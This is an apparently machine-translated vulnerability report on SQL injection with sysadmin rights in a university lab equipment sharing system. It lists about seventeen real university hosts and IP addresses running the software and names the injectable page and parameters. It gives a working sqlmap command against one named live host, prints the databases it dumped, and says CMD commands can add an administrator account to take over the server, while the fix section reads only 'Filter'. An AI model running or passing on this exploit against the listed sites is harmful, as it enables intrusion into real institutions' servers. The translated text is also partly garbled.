SA permission injection in a teaching management system #1 (non-repetitive)

SA permission injection in a teaching management system #1 (non-repetitive)

 

"Large instrument and equipment sharing platform system" software address http://www.wanxinsoft.com/product1_1.asp

 

Some cases: some university cases using the system:

Http: // 182.129.150.10: 8001/

Http://sgjxsyzx.ecust.edu.cn/

Http: // 61.132.139.110: 8888/

Http: // 59.69.101.10/

Http://www.dzgc.cdut.edu.cn/

Http: // 202.206.48.106/

Http://aacc.cumt.edu.cn/

Http://lysyzx.hqu.edu.cn/

Http: // 210.33.29.49/

Http: // 222.204.208.4/

Http://emlab.usst.edu.cn/

Http: // 202.120.50.200/

Http://hzhlab.hytc.edu.cn/

Http://lab.hutc.zj.cn: 8090/

Http://dgdz.xzit.edu.cn

The http://labch.cumt.edu.cn: 81/

Http://lab.hutc.zj.cn: 8070/



Injection file: model/twogradepage/newsdetail. aspx is still the SA permission. You can even directly execute the CMD command to add an administrator account and drop the server as a hacker!



Vulnerability exploitation Demonstration:

Shot point:

Http://lab.hutc.zj.cn: 8090/model/twogradepage/newsdetail. aspx? Id = 132 & columnid = 70



Sqlmap. py-u "http://lab.hutc.zj.cn: 8090/model/twogradepage/newsdetail. aspx? Id = 132 & columnid = 70 "-- dbs

Available databases [9]:

[*] Huc_eietc

[*] Huc_esatc

[*] Huc_lsetc

[*] Master

[*] Model

[*] Msdb

[*] Northwind

[*] Pubs

[*] Tempdb

Command Execution:

--------------------------------------------------------------------------------
 

Solution:

Filter